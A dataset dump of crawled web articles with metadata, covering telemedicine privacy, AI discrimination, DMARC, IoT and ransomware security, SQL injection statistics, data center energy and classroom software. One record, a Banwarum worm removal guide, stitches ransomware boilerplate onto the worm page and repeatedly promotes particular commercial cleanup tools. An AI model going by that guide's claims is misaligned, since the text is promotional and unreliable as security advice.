text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Security and Privacy for Telemedicine Telemedicine is taking the medical world by storm. And one can easily see why. Telemedicine, the remote diagnosis and treatment of patients by means of telecommunications technology, allows healthcare professionals to provide services in ways not known before in traditional medical appointments. While telemedicine may not be perfect, it enhances efficiency and productivity of medical treatments by not only making information available to patients electronically, it also offers multiple options for a quicker contact with patients rather than bringing them in for a traditional consultation or follow-up, resulting in increased convenience and reduced costs. Patients in remote areas could get access to specialists without traveling to see them for each appointment. Remote patient monitoring becomes a lot easier with technology. Consultation between specialists is also facilitated, thereby improving overall patient care. The Virtual Doctor is here to stay! This is all possible due to advances in technology. But where there is technology, there needs to be security, privacy and control. With cybercrime and medical identity theft rising at an alarming rate, telemedicine channels, data and equipment are just as vulnerable or even more vulnerable than traditional treatment channels, and therefore must be secure. Processes followed for telemedicine must be as private as in a traditional consultation in order to properly protect patient health information. It also falls under the scope of HIPAA, so medical practitioners must ensure that their annual HIPAA Risk Assessment reviews their telemedicine channels, equipment and processes as well. Let’s look here at what steps a medical practice must take to keep their telemedicine channels, equipment and data secure and private. - In any telemedicine consultation, both parties must authenticate themselves to one another, through passwords and/ or other keys that are known only among themselves. Not only must the patient be sure that he/ she is talking with the right physician, but also the physician must be confident that it is the right patient on the other side. - The channel of communication – telephone, video, etc. – must be private. Any data transmitted electronically must be encrypted end-to-end. - Are all parties in the communication authorized to receive that data? In addition, all users in the electronic consult must have unique user ids and sharing of user ids must be discouraged. - Access alone is not enough – what can that person do with the data? Its important that access control is clearly specified and followed – who has rights to view, modify and delete data that is part of the telemedicine transmission. - The system used should have sufficient audit logs and the process at the physician’s office should involve periodic review of audit logs that show who has accessed what data, and what has been done with that data. - We have discussed technical controls, but physical controls are just as important. Equipment used for telemedicine consultations should be kept in a private place with access provided only to authorized personnel. Conversations on phone and video should be conducted privately so that no unauthorized person can hear. In summary, physicians should ensure that their annual HIPAA Risk Assessment addresses their telemedicine service in depth, reviewing data privacy, security controls and physical security. Incident response plans must cover telemedicine channels and equipment so that appropriate action can be taken in the event of a medical data breach. All steps must be taken to protect Patient Health Information in telemedicine with at least the same security and privacy processes used in all other areas of healthcare operations. Telemedicine can be very effective by providing the right care in the right place at the right time to patients who need it - all it requires is implementing the right controls for the right levels of safety, security and privacy. By Rema Deo.
<urn:uuid:9c036606-9891-4bb8-9ff3-cd6804cf90ba>
CC-MAIN-2022-40
https://blog.24by7security.com/security-privacy-telemedicine
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00476.warc.gz
en
0.947463
773
2.5625
3
Machine learning systems trained to minimize prediction error may often exhibit discriminatory behavior based on sensitive characteristics such as race and gender. One reason could be due to historical bias in the data. Copyright by www.analyticsinsights.com The adoption of Artificial Intelligence is gaining momentum, but the fairness of the algorithmic structure is heavily scrutinized by the federal authorities. Despite many efforts made by the organizations to keep their AI-services and solutions fair, the permeating and pre-existing biases in AI has become challenging in recent years. Big tech organizations such as Facebook, Google, Amazon and Twitter amongst others have faced the wrath of federal agencies, over the recent months. Owing to the death of George Floyd and the #blacklivesmatter movement, the organizations have become vigilant regarding the operational framework of their AI. With federal, national and international agencies constantly pointing at the discriminatory algorithms, the tech start-ups and organizations are struggling to make their AI-solutions fair. But how can organizations keep clear from deploying discriminatory algorithms? What solutions will thwart such biases? The legal and statistical laws, articulated by the federal agencies to a large extent help in quelling down the algorithmic biases. For example, the existing legal standards in the laws like the Equal Credit Opportunity Act, the Civil Rights Act and the Fair Housing Act and other chartered acts, alleviate the possibility of such biases. Moreover, the effectiveness of these standards depend upon the nature of algorithmic discrimination that organizations are subjected to. Currently, organizations are faced by two types of discriminatory framework, which is either intentional or unintentional. These are known as Disparate Treatment and Disparate Impact respectively. Disparate Treatment is intentional employment discrimination with the highest legal penalties. Organizations must avoid getting engaged with such discrimination while adopting AI. Moreover, by analyzing the record of employee behavior, disparate treatment can be avoided. Disparate Impact, also the unintentional discrimination occurs when policies, practices, rules or other systems that appear to be a neutral result in a disproportionate impact. For example, certain test results eliminate minority applicants unintentionally or disproportionately is Disparate Impact. Disparate Impact is heavily influenced by the inequalities of society, and it becomes extremely difficult to avoid them as it exists in almost all areas of the societal framework. Unfortunately, organizations do not have a specific solution that can aid in immediate rectification of disparate impact. The tenants of disparate impact are so deeply engraved that identifying them becomes tedious, and often organizations do not want to indulge in. For example, there is no proper definition of ‘fairness’ in society. The word is discriminatory in terms of racial context, but in the organizational set up it signifies accuracy. These two concepts, along with two dozen more, complicate the process of algorithmic training. Additionally, a Google blog explains the fairness in machine learning systems to be derived from the lending problem. Hansa Srinivasan, Software Engineer, Google Research states, “This problem is a highly simplified and stylized representation of the lending process, where we focus on a single feedback loop in order to isolate its effects and study it in detail. In this problem formulation, the probability that individual applicants will pay back a loan is a function of their credit score. These applicants also belong to one of an arbitrary number of groups, with their group membership observable by the lending bank.” A paper named “Delayed Impact of Fair Machine Learning” by the Berkeley Artificial Intelligence Research points that machine learning systems trained to minimize prediction error may often exhibit discriminatory behavior based on sensitive characteristics such as race and gender. Lydia T. Liu, the lead researcher and the author of the paper states that “One reason could be due to historical bias in the data. In various application domains including lending, hiring, criminal justice, and advertising, machine learning has been criticized for its potential to harm historically underrepresented or disadvantaged groups.” The researchers and Statisticians have formulated many methodologies that could abide by the legal standards. One such methodology proving comparatively effective while dealing with algorithm discrimination is 80% rule. Formulated in the year 1978, by EEOC, Department Of Labor, Department of Justice, and the Civil Service Commission, it setups guidelines for Employee Selection Procedures. […]
<urn:uuid:0353089e-32c9-4e3a-88b3-f990f6ab811f>
CC-MAIN-2022-40
https://swisscognitive.ch/2020/11/05/ai-against-discrimination/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00476.warc.gz
en
0.944683
864
3.25
3
What Is DMARC? How It Sends Secure Emails & Stops Spoofing DMARC (Domain-based Message Authentication, Reporting & Conformance) is a type of email authentication protocol that helps verify an email’s origins. Recipients can use DMARC to authenticate an email’s sending domain and domain owners can also ensure their domain isn’t used for email spoofing. If DMARC is in place, receiving email servers will not deliver an incoming email until authenticating the sending domain. DMARC helps protect domains from business email compromise and phishing attacks that use domain spoofing to trick victims. It essentially allows email senders and receivers to work together to improve email security, protecting organizations and users alike. How Does DMARC Work? DMARC aligns with DKIM and/or SPF authentication mechanisms. Domain owners can publish a DMARC record in the DNS for email servers to adhere to. It’s a text entry with domain policy specifications. Depending on specifications, once DKIM or SPF (or both) pass, DMARC authenticates, allowing an email server to verify a sending domain. Domain owners can use DMARC to instruct servers: Whether the domain uses DKIM, SPF, or both to send mail. How to verify the From: field. When to allow, quarantine, or reject an email. How to report any actions. What to do with a failure. If a domain owner creates a DMARC record indicating that their emails are protected by DKIM or SPF, external servers will verify those records before delivering the email. If it doesn’t pass, the email server can assume it’s not from the purported domain, and reject it or quarantine it in the junk folder, depending on the DMARC specifications. What Does DMARC Do? DMARC authentication is an added layer of security and authentication in an email exchange. This is crucial as email scams grow in both frequency and scope of damage. DMARC helps prevent email spoofing, a common tactic cybercriminals use to send convincing phishing emails. This protects brands from harmful impersonations, and users from interacting with hard-to-detect scam emails. A convincing email spoof is extremely difficult for users to notice. With DMARC authentication, email spoofing is considerably more difficult. Email servers can detect and quarantine spoofed emails from non-authenticated domains with more accuracy. It’s beneficial for both email senders and recipients. A DMARC Record Example A DMARC record is stored directly in a DNS as a TXT record. Here’s an example of what it looks like: This example contains the following parameters: v: Protocol version pct: Percent of messages to filter rua: Email address to send aggregate reports The parameters in this DMARC report requests that recipients quarantine all non-aligned emails, sending an aggregate report to the email address. There are various other tags and policies you can use to specify different actions. None: Don’t restrict the email. Quarantine: Deliver the email into a restricted location, like a junk folder. Reject: Don’t deliver the email. Beyond version (v), policy (p), percentage (pct), and (report email address) rua, there are a several other tags: Subdomain policy (sp): The DKIM policy for any associated subdomains. Failure reporting options (fo): Specifies how to create forensic reports. ADKIM (adkim): Alignment mode for DKIM. ASPF (aspf): Alignment mode for SPF. Report format (rf): How to format the forensic report. DMARC vs. DKIM vs. SPF What’s the difference between DMARC, DKIM, and SPF? They’re all standard email authentication protocols that work together to safely deliver secure emails. DKIM (DomainKeys Identified Mail) helps ensure sender addresses aren’t forged and emails aren’t altered in transit. DKIM affixes a digital signature linked to a domain name, so recipients can verify that the sender address is authorized by said domain. SPF (Sender Policy Framework) specifies the mail server that domain owners use to send mail from. The receiving mail server can check it to verify that incoming mail comes from IP addresses that are authorized to send from said domain. DMARC works with both DKIM and SPF to authenticate and deliver emails. Depending on DMARC specifications, servers will verify that DKIM and/or SPF are aligned. In short, they’re all separate but related authentication protocols.
<urn:uuid:60229a1a-45b9-4903-a846-a367699e1759>
CC-MAIN-2022-40
https://abnormalsecurity.com/glossary/dmarc
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00476.warc.gz
en
0.841369
1,024
3.390625
3
Banwarum Removal Guide What is Banwarum? Banwarum is a worm that spreads on the Internet and can run in the back without any symptoms Banwarum is the infection that can access the machine and trigger issues with the performance. Unfortunately, it spreads by e-mail, and in local networks by exploiting computers running the Windows operating system with known vulnerabilities. The virus can affect the system and leave the system without causing issues. The worst thing about an infection like this is the silent infiltration and the fact the worm trigger pretty much no symptoms. |Issues||The malware is not showing up as the program or a process it triggers additional activities to open backdoors for malware or record data| |Distribution||Files with malicious codes can be included on email notifications as file attachments and can be distributed via malicious sites| |Elimination||You need anti-malware tools for the proper virus removal| |Repair||ReimageIntego can help fix the virus damage| Once executed, the parasite installs itself to the system and runs a spreading routine. Banwarum searches local drives for text and spreadsheet documents, web pages, and various programming files. Then it uses its own mail engine to send e-mail messages to all the addresses it gathers from found files. Letters are written in German. Each of them has Zip or RAR archive attached. That archive contains the parasite. Banwarum also scans the local networks for systems with unpatched Windows flaws and infects vulnerable computers. This is a dangerous threat because it can trigger infiltrations without any permission or users' knowledge. When the worm is present on the machine it can trigger infection like ransomware drop and affect the machine further. If malware, trojan, or even ransomware finds the way on the computer, the machine can get significantly damaged. You shouldn't ignore these suspicious issues when the machine runs slow and run SpyHunter 5Combo Cleaner or Malwarebytes to find all the threats. The worm's payload is comprised of several harmful functions. Banwarum collects system information and transfers it to the attacker. It also opens a back door providing the intruder with remote unauthorized access to the compromised computer and allowing him to control the system and steal user sensitive information. Make sure to clear any infections from the machine when the anti-malware tool indicates parasites. Malware like this worm injects malicious code into legitimate system processes in order to avoid detection. This is why you might want to run the PC in Safe Mode with networking. Banwarum runs on every Windows startup, so persistence is ensured by additional processes and files added in various system folders. Make sure to double-check, fix virus damage before doing anything else. You can rely on ReimageIntego for that. Getting rid of Banwarum. Follow these steps Scan your system with anti-malware If you are a victim of ransomware, you should employ anti-malware software for its removal. Some ransomware can self-destruct after the file encryption process is finished. Even in such cases, malware might leave various data-stealing modules or could operate in conjunction with other malicious programs on your device. SpyHunter 5Combo Cleaner or Malwarebytes can detect and eliminate all ransomware-related files, additional modules, along with other viruses that could be hiding on your system. The security software is really easy to use and does not require any prior IT knowledge to succeed in the malware removal process. Manual removal using Safe Mode Manual removal guide might be too complicated for regular computer users. It requires advanced IT knowledge to be performed correctly (if vital system files are removed or damaged, it might result in full Windows compromise), and it also might take hours to complete. Therefore, we highly advise using the automatic method provided above instead. Step 1. Access Safe Mode with Networking Manual malware removal should be best performed in the Safe Mode environment. Windows 7 / Vista / XP - Click Start > Shutdown > Restart > OK. - When your computer becomes active, start pressing F8 button (if that does not work, try F2, F12, Del, etc. – it all depends on your motherboard model) multiple times until you see the Advanced Boot Options window. - Select Safe Mode with Networking from the list. Windows 10 / Windows 8 - Right-click on Start button and select Settings. - Scroll down to pick Update & Security. - On the left side of the window, pick Recovery. - Now scroll down to find Advanced Startup section. - Click Restart now. - Select Troubleshoot. - Go to Advanced options. - Select Startup Settings. - Press Restart. - Now press 5 or click 5) Enable Safe Mode with Networking. Step 2. Shut down suspicious processes Windows Task Manager is a useful tool that shows all the processes running in the background. If malware is running a process, you need to shut it down: - Press Ctrl + Shift + Esc on your keyboard to open Windows Task Manager. - Click on More details. - Scroll down to Background processes section, and look for anything suspicious. - Right-click and select Open file location. - Go back to the process, right-click and pick End Task. - Delete the contents of the malicious folder. Step 3. Check program Startup - Press Ctrl + Shift + Esc on your keyboard to open Windows Task Manager. - Go to Startup tab. - Right-click on the suspicious program and pick Disable. Step 4. Delete virus files Malware-related files can be found in various places within your computer. Here are instructions that could help you find them: - Type in Disk Cleanup in Windows search and press Enter. - Select the drive you want to clean (C: is your main drive by default and is likely to be the one that has malicious files in). - Scroll through the Files to delete list and select the following: Temporary Internet Files - Pick Clean up system files. - You can also look for other malicious files hidden in the following folders (type these entries in Windows Search and press Enter): After you are finished, reboot the PC in normal mode. Finally, you should always think about the protection of crypto-ransomwares. In order to protect your computer from Banwarum and other ransomwares, use a reputable anti-spyware, such as ReimageIntego, SpyHunter 5Combo Cleaner or Malwarebytes How to prevent from getting worms Stream videos without limitations, no matter where you are There are multiple parties that could find out almost anything about you by checking your online activity. While this is highly unlikely, advertisers and tech companies are constantly tracking you online. The first step to privacy should be a secure browser that focuses on tracker reduction to a minimum. Even if you employ a secure browser, you will not be able to access websites that are restricted due to local government laws or other reasons. In other words, you may not be able to stream Disney+ or US-based Netflix in some countries. To bypass these restrictions, you can employ a powerful Private Internet Access VPN, which provides dedicated servers for torrenting and streaming, not slowing you down in the process. Data backups are important – recover your lost files Ransomware is one of the biggest threats to personal data. Once it is executed on a machine, it launches a sophisticated encryption algorithm that locks all your files, although it does not destroy them. The most common misconception is that anti-malware software can return files to their previous states. This is not true, however, and data remains locked after the malicious payload is deleted. While regular data backups are the only secure method to recover your files after a ransomware attack, tools such as Data Recovery Pro can also be effective and restore at least some of your lost data.
<urn:uuid:1ce3c004-655d-436b-ab97-458fa166fba5>
CC-MAIN-2022-40
https://www.2-spyware.com/remove-banwarum.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00676.warc.gz
en
0.891698
1,689
2.5625
3
The massive distributed denial-of-service (DDoS) attack on DNS provider Dyn late last week in which Internet of Things (IoT) devices were compromised and used as part of the bot army that slowed access to popular websites such as Amazon, Twitter, and PayPal, underscored long-known vulnerabilities with IoT. Today, security company ESET in tandem with the National Cyber Security Alliance (NCSA) released a study that indicates that while consumers may be aware of security issues with IoT, many haven not taken steps to secure IoT devices in the home. The study was developed as part of the National Cyber Security Awareness Month. "People need to understand that some of their IoT devices in the home can be used for these type of DDoS attacks," says NCSA’s Michael Kaiser. Stephen Cobb, senior security researcher at ESET, says the good news from the ESET/NCSA study is that consumers are aware of the serious security issues around IoT. "There's no question that starting with the Target hack and the Edward Snowden revelations, there's a growing awareness on the need for security by the public," Cobb says. In terms of the public's knowledge of IoT security issues, the ESET/NCSA study found the following: · 88% of consumers have thought about the reality that IoT devices and the data they collect could be accessed by hackers. · 85% know that some computer webcams can be accessed by hackers to spy on them without their knowledge; and 29% are or have been, afraid that someone might have accessed their webcams or video calls without their consent. · 77% are aware that some cars may be vulnerable to hacking; and 45% are very or somewhat concerned that their own car might have the potential to be hacked. · 76% were either "very concerned" or "somewhat concerned" about the security and privacy risks of Internet-connected smart toys. "It’s pretty clear that the public is concerned about connected devices by the response people had around connected toys," Cobb says. "But we have to do a better job educating the public on how to protect their networks." For example, the study found that 29% of consumers have not changed their home router password from its default setting; and another 15% do not even know if they have changed passwords for their home router. "When not protected properly, the home router is an entry point for malware," says NCSA's Kaiser. "A basic step such as changing the default factory password is necessary for protecting the home network." The ESET/NCSA study also offers five tips for consumers: 1. Learn how to maintain the security of IoT devices. Consumers need to protect their IoT devices the same way they would their smartphones, tablets and home computers. Look for ways to set strong passwords, reading the manuals for instructions on how to lock down these devices. 2. Clean out old apps. Many of us tend to keep apps indefinitely, even if we don't use them. Check your devices periodically and delete apps you no longer use. 3. Own your online presence. Understand what information your devices collect and how they it is managed and stored. 4. Do your research. Before you purchase an IoT device, do a search to see if it has had security problems with it and if it can be easily hacked. 5. Change the default setting on the home router. This is worth reiterating: Strong passwords on home routers can prevent the type of DDoS that happened last Friday to Dyn.
<urn:uuid:a87b42e7-adf4-4ca4-99c8-247a1313e80f>
CC-MAIN-2022-40
https://www.darkreading.com/endpoint/5-tips-for-preventing-iot-hacks
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00676.warc.gz
en
0.964483
729
2.578125
3
SQL injection (SQLi) is a frequent topic on this blog – it refers to an injection attack that allows an attacker to execute malicious SQL statements that allow the attacker to control a web application’s database server. Since an SQL injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities. An attacker taking advantage of an SQLi vulnerability is essentially exploiting a weakness introduced into the application through poor web application development practices. This allows attackers to send SQL commands to the web application, allowing them to gain unauthorized access to data held in the backend database. By leveraging an SQL injection vulnerability, given the right circumstances, an attacker can use it to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete records in a database, affecting data integrity. To such an extent, SQL injection can provide an attacker with unauthorized access to sensitive data including, customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information. While SQLi is mostly used to steal data from the database, the vulnerability can be escalated further, especially if the permissions on the database are not correctly configured. For example, the attacker can inject a query that causes some tables to be deleted from the database, effectively causing a DoS attack. An attacker can also potentially deploy a web shell onto the server and subsequently take over the server, and even pivot into other systems as a result of SQLi. So, we established SQLi is a major threat to any web application not properly handling user input to SQL statements to the database, but how common is the vulnerability? In our latest Web Application Vulnerability Report we registered a 3% drop in SQL injection from the previous year. The fact that SQL injection is slowly receding is good news for defenders — it means that all the effort poured in by educators in the field is starting to bear fruit. This being said, at 23% of sampled targets being vulnerable to SQLi, we are certainly nowhere near casting it away into the history books. This post contained excerpts from the 2016 Acunetix Web Application Vulnerability Report. For more stats and coverage on web application vulnerabilities in 2016, download the report for free. Get the latest content on web security in your inbox each week.
<urn:uuid:fe9245f8-5ff2-4d9a-94df-78ced08fe53d>
CC-MAIN-2022-40
https://www.acunetix.com/blog/articles/sql-injection-receding-but-still-concern/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00676.warc.gz
en
0.905268
502
2.875
3
Everyone wants to do more with less. In the data center, this means increasing the data load while reducing hardware, infrastructure, management and power consumption. While most of these items are achievable with virtualization and automation, the power equation is a bit trickier, if only because most people outside the industry fail to appreciate the connection between the data services they demand and the energy it takes to provide them. Even if systems are more efficient, at the end of the day, the data center industry is still consuming steadily more power. Admittedly, part of this is due to lack of participation from the data center industry. As a recent survey from IDC pointed out, the bread-and-butter enterprise still has not jumped on the energy efficiency bandwagon like the web-scale industry has. Simple economics plays a big part in this equation: Large-scale facilities have to drive efficiency to new levels lest their energy budgets crash the entire business model. As well, standard enterprises often have lower utilization rates in order to protect critical apps and services, whereas large cloud providers are more adept at shifting loads should key components go dark. Still, the average data center represents a major cost center for any business, so why aren’t organizations doing more to lessen their power bills? It may have something to do with the cloud itself, says Datacenter Journal’s Jeff Clark. Given the choice between replacing aging, high-power components with lower-power devices or simply porting workloads to the cloud, many are choosing the cloud, which ultimately should lower their own data costs. But is this necessarily more efficient? Perhaps not, given the losses involved in highly distributed network architectures, but it would largely depend on the workloads involved and the nature of the infrastructure. Low power is also likely to infiltrate the data center on the processor level. ARM-based servers coupled with open software platforms like SUSE Linux will likely start to replace less efficient hardware as part of the normal refresh rate, perhaps cutting consumption in half when you add up the lower power draw and less cooling that the chips require. SUSE recently added ARM support to its openSUSE Build Service, which should allow third-party suppliers to speed up their implementation of 64-bit devices and SLES 12 binary files, leading to more rapid deployment in the data center. Hardware is a key component of energy usage in the data center, but so is architecture – namely, the physical architecture of the data room. As Data Center Knowledge’s Mike Vizard points out, long-standing design concepts like raised floors may soon give way to less airy configurations. For one thing, data equipment is getting denser and heavier, requiring more rigged, and expensive, floor designs. And since cold air tends to sink, a good part of the A/C that the enterprise pays for winds up under the floor to no good purpose. As well, organizations might want to rethink their power distribution infrastructure and even the wattage they provide to their racks. Of course, few enterprises are eager to undertake a bottom-up reconfiguration of their data center, so issues like energy efficiency are most often left to greenfield deployments or simply outsourced to someone else. At the end of the day, IT is rated on its ability to provide continuous service, so energy solutions that cannot be implemented in a non-disruptive manner will have a tough time making it to the data center. To those on the outside, energy efficiency is a top priority. But to people who live and work in the data center every day, it is just one of the many practical realities of providing a robust, reliable data ecosystem. Arthur Cole writes about infrastructure for IT Business Edge. Cole has been covering the high-tech media and computing industries for more than 20 years, having served as editor of TV Technology, Video Technology News, Internet News and Multimedia Weekly. His contributions have appeared in Communications Today and Enterprise Networking Planet and as web content for numerous high-tech clients like TwinStrata, Carpathia and NetMagic.
<urn:uuid:afc79f22-de8d-45a7-a826-f8d5866287c5>
CC-MAIN-2022-40
https://www.itbusinessedge.com/it-management/energy-efficiency-in-the-data-center-more-than-just-a-numbers-game/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00676.warc.gz
en
0.945269
824
2.671875
3
My computer keeps asking me to run antivirus updates; is it even important? The short answer; yes. We know, we know, every program and its mother (as the idiom goes) wants you to do an update. And it’s not always a quick little thing either. Sometimes antivirus updates can take upwards of 45 minutes, it slows down your machine, and on top of that you sometimes have to restart your computer. It can put a real damper on your productivity. What are these updates and why are they even important? The easiest way to explain antivirus updates is to compare it to a flu vaccine. When a flu vaccine is developed each year, it is designed to target the most likely and harshest strains of the flu virus. Just like malware and viruses, the flu virus has a signature that notifies your body that there is an invader, at that point antibodies are created to destroy it. If you had the flu vaccine, your body has already created antibodies that are designed to recognize that signature and destroy the virus before you get sick. Researchers look for trends in existing viruses and predict how that virus will manipulate, thus protecting you from the worst strain they can think of. Antivirus updates work in a similar fashion. When viruses are developed, many of them carry a signature. Your antivirus is designed to recognize those signatures and quarantine or delete the threats on discovery, before it has a chance to infect your computer. As antivirus developers discover new malware and malicious file types, they create a signature that describes the threat to your system. That signature is then added to the antivirus database and needs to be pushed out to the end users. Once this update is complete, the antivirus software can start protecting them from newly discovered threats. Why do we need to update so often? Having a flu shot last year will not protect an individual from the flu this year. Therefore, one must go back to the clinic and get the new shot each time it is advanced to protect themselves from the latest strain. As of December 2018, there were 350,000 new threats created PER DAY. As a result, antivirus researchers are always playing catch up to stay up to date with the latest threat. Once new strains are discovered, the developers push the update to your computer so it can be protected from tens of thousands of newly discovered threats. The longer you wait to update your system, the bigger you allow the coverage gap to get and, as a result, the longer your system is vulnerable to threats that you would otherwise be protected from. To bring it back to the metaphor, the longer you wait to get the flu shot, the higher your risk of getting the flu. If only one employee presses “remind me later” it can put your entire network at risk. Even with all of these updates in place, the rate in which new threats are evolving still leaves a chance that a virus may get in undetected. Which is why antivirus should be the first line of defence in a multi-tiered protection plan that also includes system monitoring, consistent back ups and a tested disaster recovery plan. Having a tiered security plan in place shifts a malware or ransomware attack from a detrimental and possibly fatal event to your company, to a minor inconvenience. Rather than scrambling to do damage control, your MSP can simply push a button to go back in time to before the system was hijacked – without having to dish out thousands or even millions to cybercriminals. With this type of service in place, your MSP can help create security protocols that schedule updates when employees have gone home for the day, keeping them productive – but also confirming that important scans and updates are followed through with, keeping your systems protected from lurking threats.
<urn:uuid:cdd5c897-fb88-4024-9c56-d43ed2d2851d>
CC-MAIN-2022-40
https://logix.ca/security/are-antivirus-updates-important/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00676.warc.gz
en
0.946675
768
2.8125
3
Operating in the IT sector is not without its challenges. As security and data protection have become more refined, the threats and exploits used to target businesses have also evolved; becoming more sophisticated and malicious. A malware type called ransomware has been one of the most rapidly growing threats to an individual’s and organisation’s computers, networks or data. When ransomware infects a victim’s computer, the device is either locked or its data is encrypted, held hostage, until a ransom is paid to cybercriminals for a decryption key. Ransomware has been around for a long time, however, in the past couple of years it has become one of the most prominent and costly (opens in new tab) threats to businesses across the globe. In August 2016, Malwarebytes surveyed 500 companies and found that 40 per cent of them have experienced a ransomware attack in the past year; with 54 per cent of UK businesses claiming to be victims. In addition, security solution provider Trend Micro, carried out a report into the rising threat of ransomware and found that attacks are up by 179 per cent in the first half of 2016 compared to the whole of 2015. More and more ransomware attacks are being reported in the media and it isn’t just large private organisations that are being hit. In September 2016 it was reported that 28 NHS Trusts had admitted to an attempted attack being carried out against them. Additionally, universities and other academic institutions are proving to be popular targets with Bournemouth university being attacked 21 times in the past 12 months. Despite the growing risk ransomware poses, security experts claim that UK business are still failing to take the threat seriously and therefore aren’t adequately protecting themselves from being a target. So what is holding these firms back from taking notice of a very real threat? Are they simply hoping that they don’t fall victim to such an attack or are they in the dark on how they can properly prepare? To pay or not to pay the ransom? Malwarebytes’ research into ransomware looked at the impact of the attacks and in particular the financial implications for those who are targeted. It revealed that the ransom demanded could be a significant financial blow for the company. One-fifth of British firms hit by ransomware reported the ransom to be more than $10,000. An additional 3 per cent were charged over $50,000. Whilst the costs associated with ransomware can be hefty, firms are still paying the ransom in order to get their data back. Paying the ransom doesn’t necessarily guarantee that a victim receives any data back and will only encourage cybercriminals behind ransomware attacks to continue with their illegal activity, perpetuating the criminal market for this activity. Trend Micro found that one in three targeted firms who paid the ransom still didn’t get their data back. However, for many organisations paying the ransom seems like the only way to gain access to their data. Prevention and protection is key, backup Is a must Ransomware spreads through a various number of ways, but four of the most common ways are: through spam emails and unsolicited email attachments, infected removable drives, compromised webpages, and bundled with other software downloads. In order to avoid coming into contact with ransomware one must be vigilant. Practice email hygiene, don’t open suspicious looking emails or click on unknown attachments and links. Be careful when connecting unknown removable drives to your machine. Use caution when browsing the Internet, be sure your firewall is activated. Whenever you download any software applications, ensure that you use reputable download sources. Backing up data is probably the most important step to safeguard against ransomware. Anti-ransomware specialists recommend backing up all data outside of your own Local Area Network (LAN) and making sure you have the ability to recover an entire system. It’s critical to ensure the backup is isolated from your network to keep it safe from infection. It is also important to check the integrity of your backups regularly to ensure you are prepared in case of a ransomware hit. If you back up in this manner and you are the victim of an attack, you are able to format everything to rid yourself of the ransomware infection and then do a full system recovery. This way you will not have to engage with the ransomware at all and you can restore your computer back to the way it was before it was compromised. In addition to backing up your company’s data, investing in reputable antivirus software and a robust, well configured firewall is key in preventing the threat of ransomware. Keeping your security software up to date will allow for early detection of an infection. Organisations seeking to ensure a ransomware infection has minimal impact should ensure that their backup regime provides the ability to access backed up data instantly in the event of a disaster. If your current backup service provider can’t accommodate providing instant access to your data, perhaps it is time to change. Paul Evans, Co-Founder and CEO of Redstor (opens in new tab) Image source: Shutterstock/Carlos Amarillo
<urn:uuid:61956337-8955-4984-a521-f23e3fc60762>
CC-MAIN-2022-40
https://www.itproportal.com/features/holding-data-hostage-the-rising-threat-of-ransomware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00676.warc.gz
en
0.95745
1,033
2.703125
3
The concept of computer-based learning, also known as e-learning, is playing an increasingly important role in all industries. According to Global Market Insights, the market’s total value will exceed $240 billion by 2023, as an increasing number of organizations start to rely more heavily on the internet and electronic resources to enhance the learning experience. While corporations can significantly benefit from using computer resources for training purposes, no sector is in quite as strong a position to receive a boost from computer-based learning as education. Success of e-learning implementations at any level, however, hinges upon proper implementation. Here are a few tips and tricks to enable computer-based learning in educational/ training environments. Restrict Distracting Websites and Applications Ever since the first computers were installed in classrooms, there have been concerns about students being distracted, or accessing unsavory content on the web. With the inclusion of laptops, Chromebooks and tablets, managing an e-learning environment has only become more difficult for educators at all levels. In order to foster an engaging learning environment, it’s important that educators have the ability to easily restrict the usage of certain applications and websites on classroom endpoints. The easiest way to do this is to create a whitelist of apps and websites, which have been authorized for access. Make the Most of Digital Capabilities The purpose of computer-based learning is to improve education. But successfully leveraging e-learning resources isn’t necessarily intuitive at first; much like in the enterprise, there need to be digital collaboration platforms in place to make the most of a computer environment. For an educator, these collaboration features entail the following: - Easily communicate with one or more students at a time via instant messaging. - Create student polls, quizzes and in-class questionnaires and quickly share them with an entire classroom. - Instantly launch applications on multiple endpoints from a single dashboard. - Co-browse with students to help them solve problems. - Display a particular screen to the entire class to walk through a creative solution to a problem. Achieve Visibility and Control Ensuring students stay engaged and making full use of a computer’s learning capabilities has great potential to improve an educator’s pool of resources. But this is especially true when you don’t have to worry about whether students are cheating on a pop quiz by looking up the answers online – or doing something on their device that is disruptive to learning. To that end, classroom management software can help with the following: - Locking down and blanking out students’ screens during lectures. - Locking down applications during a computer-based exam. - Viewing a student’s screen to assess or monitor activity. - Taking screen shots if necessary, either for learning or discipline purposes. Computer-based learning has immense potential to improve the educational experience for students and teachers alike. It’s really just a matter of leveraging that potential with the right set of classroom management tools, so that you can help students learn more effectively. To learn more about our classroom management solutions, contact Faronics today.
<urn:uuid:68ff4fb1-29c2-4d33-8969-e10112b8faf7>
CC-MAIN-2022-40
https://www.faronics.com/news/blog/enable-computer-based-learning-educational-environments
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00676.warc.gz
en
0.945807
652
3.375
3
